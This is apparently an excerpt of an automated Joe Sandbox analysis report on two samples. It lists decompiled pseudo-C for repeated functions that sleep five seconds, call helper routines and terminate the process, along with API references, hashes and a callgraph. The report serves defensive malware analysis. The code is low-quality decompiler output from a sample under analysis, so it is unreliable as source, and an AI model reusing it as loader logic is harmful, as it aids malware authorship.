                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                        • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                        • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                        • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000001.00000002.395991467.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                        • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                        • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                        • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 17%
                        			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                        				void* _t11;
                        				intOrPtr* _t17;
                        				void* _t19;
                        				void* _t22;
                        
                        				_t23 = __eflags;
                        				asm("out 0x95, eax");
                        				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                        				_t17 =  *((intOrPtr*)(_t22 + 8));
                        				Sleep(0x1388);
                        				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                        				if(_t11 != 0) {
                        					_push( *((intOrPtr*)(_t22 + 0x14)));
                        					_push( *((intOrPtr*)(_t22 - 4)));
                        					_push(_t11);
                        					_push(_t17); // executed
                        					L00401455(0x60, _t19, __edi); // executed
                        				}
                        				 *_t17(0xffffffff, 0); // executed
                        				_t17 = _t17 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                        				_pop(__edi);
                        				_pop(__esi);
                        				_pop(__ebx);
                        				__esp = __ebp;
                        				_pop(__ebp);
                        				return __eax;
                        			}







                        0x00401822
                        0x00401822
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x00401899
                        0x0040189e
                        0x0040189f
                        0x004018a0
                        0x004018a1
                        0x004018a1
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000001.00000002.395991467.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                        • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                        • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                        • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 17%
                        			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                        				void* _t8;
                        				void* _t11;
                        				intOrPtr* _t17;
                        				void* _t19;
                        				void* _t22;
                        
                        				_t23 = __eflags;
                        				asm("sbb ebx, ebp");
                        				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                        				_t17 =  *((intOrPtr*)(_t22 + 8));
                        				Sleep(0x1388);
                        				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                        				if(_t11 != 0) {
                        					_push( *((intOrPtr*)(_t22 + 0x14)));
                        					_push( *((intOrPtr*)(_t22 - 4)));
                        					_push(_t11);
                        					_push(_t17); // executed
                        					L00401455(0x60, _t19, __edi); // executed
                        				}
                        				 *_t17(0xffffffff, 0); // executed
                        				_t17 = _t17 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                        				_pop(__edi);
                        				_pop(__esi);
                        				_pop(__ebx);
                        				__esp = __ebp;
                        				_pop(__ebp);
                        				return __eax;
                        			}








                        0x00401826
                        0x00401826
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x00401899
                        0x0040189e
                        0x0040189f
                        0x004018a0
                        0x004018a1
                        0x004018a1
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000001.00000002.395991467.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                        • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                        • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                        • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 20%
                        			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                        				void* _t10;
                        				void* _t13;
                        				intOrPtr* _t19;
                        				void* _t22;
                        				void* _t25;
                        
                        				_t26 = __eflags;
                        				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                        				_t19 =  *((intOrPtr*)(_t25 + 8));
                        				Sleep(0x1388);
                        				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                        				if(_t13 != 0) {
                        					_push( *((intOrPtr*)(_t25 + 0x14)));
                        					_push( *((intOrPtr*)(_t25 - 4)));
                        					_push(_t13);
                        					_push(_t19); // executed
                        					L00401455(0x60, _t22, __edi); // executed
                        				}
                        				 *_t19(0xffffffff, 0); // executed
                        				_t19 = _t19 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                        				_pop(__edi);
                        				_pop(__esi);
                        				_pop(__ebx);
                        				__esp = __ebp;
                        				_pop(__ebp);
                        				return __eax;
                        			}








                        0x00401834
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x00401899
                        0x0040189e
                        0x0040189f
                        0x004018a0
                        0x004018a1
                        0x004018a1
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000001.00000002.395991467.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                        • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                        • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                        • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:6.1%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:19
                        Total number of Limit Nodes:0
                        execution_graph 668 402ad1 669 402ad2 668->669 671 402b56 669->671 672 40180c 669->672 673 40181b 672->673 674 40183e Sleep 673->674 676 401859 674->676 675 40186a NtTerminateProcess 677 401876 675->677 676->675 677->671 682 401818 683 40181b 682->683 684 40183e Sleep 683->684 686 401859 684->686 685 40186a NtTerminateProcess 687 401876 685->687 686->685 688 402a9d 689 402ad2 688->689 690 40180c 2 API calls 689->690 691 402b56 689->691 690->691

                        Callgraph

                        • Executed
                        • Not Executed
                        • Opacity -> Relevance
                        • Disassembly available
                        callgraph 0 Function_00401246 1 Function_00401748 2 Function_00401BC9 3 Function_00402ACE 53 Function_0040180C 3->53 4 Function_004011D0 5 Function_00402AD1 5->53 6 Function_00401DD3 7 Function_00401AD5 8 Function_004011D7 9 Function_00402B58 10 Function_00402DD8 11 Function_00402E59 12 Function_004023DB 13 Function_00402E5C 14 Function_004027DC 15 Function_0040195D 16 Function_0040275E 17 Function_004010DF 18 Function_00402DE2 19 Function_00401064 20 Function_004016E4 21 Function_00402B66 22 Function_00401D66 23 Function_00402F6A 24 Function_0040136B 25 Function_004011EB 26 Function_00402D6E 27 Function_004025EF 28 Function_00402BEF 29 Function_00402E75 30 Function_00402D75 31 Function_00402575 32 Function_004015F5 33 Function_00402DF5 34 Function_00402CF7 35 Function_00402D79 36 Function_004017F9 37 Function_0040187A 38 Function_00402B7A 39 Function_0040157F 40 Function_00402E7F 41 Function_004013FF 42 Function_00401381 43 Function_00402102 44 Function_00401E82 45 Function_00402B82 46 Function_00402E83 47 Function_00401884 48 Function_00401705 49 Function_00402706 50 Function_00401786 51 Function_00401686 52 Function_0040188B 53->42 54 Function_0040138C 55 Function_00401A8C 56 Function_00402993 57 Function_00402E14 58 Function_00401894 59 Function_00402794 60 Function_00402E94 61 Function_00401715 62 Function_00401297 63 Function_00401818 63->42 64 Function_00401898 65 Function_00402E98 66 Function_0040131A 67 Function_0040259B 68 Function_00402A9D 68->53 69 Function_0040281D 70 Function_0040139D 71 Function_00402E20 72 Function_004013A0 73 Function_00401822 73->42 74 Function_00401826 74->42 75 Function_00401427 76 Function_0040212C 77 Function_00401D31 78 Function_00401D32 79 Function_00401CB2 80 Function_00402D33 80->4 81 Function_00401834 81->42 82 Function_00402635 83 Function_00402DB9 84 Function_00401D3D

                        Control-flow Graph

                        C-Code - Quality: 23%
                        			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                        				char _v8;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				void* _t11;
                        				void* _t16;
                        				intOrPtr* _t17;
                        				void* _t19;
                        				void* _t20;
                        				void* _t21;
                        
                        				_t22 = __eflags;
                        				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                        				_t17 = _a4;
                        				Sleep(0x1388);
                        				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                        				if(_t11 != 0) {
                        					_push(_a16);
                        					_push(_v8);
                        					_push(_t11);
                        					_push(_t17); // executed
                        					L00401455(0x60, _t19, _t20); // executed
                        				}
                        				 *_t17(0xffffffff, 0); // executed
                        				_t17 = _t17 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				return __eax;
                        			}














                        0x0040180c
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000006.00000002.457320658.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_400000_ehddsbh.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                        • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                        • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                        • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000006.00000002.457320658.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_400000_ehddsbh.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                        • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                        • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                        • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 17%
                        			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                        				void* _t11;
                        				intOrPtr* _t17;
                        				void* _t19;
                        				void* _t22;
                        
                        				_t23 = __eflags;
                        				asm("out 0x95, eax");
                        				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                        				_t17 =  *((intOrPtr*)(_t22 + 8));
                        				Sleep(0x1388);
                        				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                        				if(_t11 != 0) {
                        					_push( *((intOrPtr*)(_t22 + 0x14)));
                        					_push( *((intOrPtr*)(_t22 - 4)));
                        					_push(_t11);
                        					_push(_t17); // executed
                        					L00401455(0x60, _t19, __edi); // executed
                        				}
                        				 *_t17(0xffffffff, 0); // executed
                        				_t17 = _t17 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                        				_pop(__edi);
                        				_pop(__esi);
                        				_pop(__ebx);
                        				__esp = __ebp;
                        				_pop(__ebp);
                        				return __eax;
                        			}







                        0x00401822
                        0x00401822
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x00401899
                        0x0040189e
                        0x0040189f
                        0x004018a0
                        0x004018a1
                        0x004018a1
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000006.00000002.457320658.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_400000_ehddsbh.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                        • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                        • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                        • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 17%
                        			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                        				void* _t8;
                        				void* _t11;
                        				intOrPtr* _t17;
                        				void* _t19;
                        				void* _t22;
                        
                        				_t23 = __eflags;
                        				asm("sbb ebx, ebp");
                        				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                        				_t17 =  *((intOrPtr*)(_t22 + 8));
                        				Sleep(0x1388);
                        				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                        				if(_t11 != 0) {
                        					_push( *((intOrPtr*)(_t22 + 0x14)));
                        					_push( *((intOrPtr*)(_t22 - 4)));
                        					_push(_t11);
                        					_push(_t17); // executed
                        					L00401455(0x60, _t19, __edi); // executed
                        				}
                        				 *_t17(0xffffffff, 0); // executed
                        				_t17 = _t17 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                        				_pop(__edi);
                        				_pop(__esi);
                        				_pop(__ebx);
                        				__esp = __ebp;
                        				_pop(__ebp);
                        				return __eax;
                        			}








                        0x00401826
                        0x00401826
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x00401899
                        0x0040189e
                        0x0040189f
                        0x004018a0
                        0x004018a1
                        0x004018a1
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000006.00000002.457320658.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_400000_ehddsbh.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                        • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                        • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                        • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 20%
                        			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                        				void* _t10;
                        				void* _t13;
                        				intOrPtr* _t19;
                        				void* _t22;
                        				void* _t25;
                        
                        				_t26 = __eflags;
                        				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                        				_t19 =  *((intOrPtr*)(_t25 + 8));
                        				Sleep(0x1388);
                        				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                        				if(_t13 != 0) {
                        					_push( *((intOrPtr*)(_t25 + 0x14)));
                        					_push( *((intOrPtr*)(_t25 - 4)));
                        					_push(_t13);
                        					_push(_t19); // executed
                        					L00401455(0x60, _t22, __edi); // executed
                        				}
                        				 *_t19(0xffffffff, 0); // executed
                        				_t19 = _t19 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                        				_pop(__edi);
                        				_pop(__esi);
                        				_pop(__ebx);
                        				__esp = __ebp;
                        				_pop(__ebp);
                        				return __eax;
                        			}








                        0x00401834
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x00401899
                        0x0040189e
                        0x0040189f
                        0x004018a0
                        0x004018a1
                        0x004018a1
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000006.00000002.457320658.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_400000_ehddsbh.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                        • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                        • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                        • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                        Uniqueness

                        Uniqueness Score: -1.00%